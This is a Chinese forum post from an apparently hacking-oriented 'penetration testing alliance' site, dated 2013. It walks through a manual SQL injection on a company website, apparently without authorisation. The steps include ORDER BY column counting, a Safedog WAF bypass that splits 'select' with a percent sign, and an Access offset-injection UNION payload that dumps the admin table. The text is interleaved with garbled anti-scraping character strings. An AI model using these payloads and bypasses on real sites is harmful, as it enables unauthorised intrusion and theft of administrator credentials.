中国网络渗透测试联盟
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
[打印本页]
作者:
admin
时间:
2013-3-8 21:49
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
2 o( I+ P4 g0 B& P+ `" W) f
) m; n$ r" w( O6 ^1 o G
4 P5 w5 R& A" L; k) H
顺手加个admin
: r- W4 @5 U8 C& ~" G3 _
) _: m& w4 X3 \( n& ?; H, n" T! H5 w0 R
: ^4 W s; c. b5 O8 e: K
默认后台。
2 _* O0 f+ R9 T/ ?# Z
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
. ~0 p' u& u9 T
1 Q8 c) u, `; i( \: Z x8 I2 w
; T* f [# S$ y9 {8 s
h" }1 p+ H |' t. j( y
所以就不用御剑扫了,待会直接封IP。
! S% h# J7 y% s
0 z" G0 T* Y0 T7 b# y$ `+ j+ U
用order by语句判断是否存在注入。
) v5 F/ P$ k; l7 |6 T w8 K$ I# |
http://www.xxx.com
/product_show.asp?id=997 order by 1
1 n( J2 u W% m$ V+ H6 m* n( K
http://www.xxx.com
/product_show.asp?id=997 order by 100
' k! f3 T! l5 l$ d8 w
现在存在注入,经测试后发现是9个字段。
5 F0 u; B* y* w5 k% a
! {, N x) R* C9 e9 g4 P# h
接下来进行联合查询,猜是否存在admin表。
. x, o5 o; ], n! ] D4 F! ]& u
http://www.xxx.com
/product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
# s) t& T) Y: A4 D
, n8 E( f- B! s1 l
% D: N8 c E( l. p) S: e
+ `2 c9 i* @% \& L8 s
在select中间加个%,se%lect绕过安全狗。
4 C; s9 x. D7 u5 |, f% ?
1 ~ j3 N- K4 x) ~, q
) _% X9 `, O. x- x3 Z
发现存在admin表,然后开始手工猜常用的字段。
0 E: A4 \/ B+ {8 `2 o: n$ Y
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
! w% Z" I5 b& Y7 m E3 ?0 ^
9 x8 X( w9 c& I) D7 i' q
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
' L3 u% Z- \. U# W' s F% r: R6 z
9 ~, o( y" z$ L( K8 K/ [
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
" x0 j) d- T( l
http://www.xxx.com
/product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
7 Y% d1 L3 K5 L W5 x& w/ Y
好了,敏感内容出显了。
M% U- Q/ ^6 h: }
* Y) [5 Q& {! C) g2 L) N
+ I# i+ d8 r8 h, V @
3 {* ^0 C6 i( a; f( Y0 Z
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2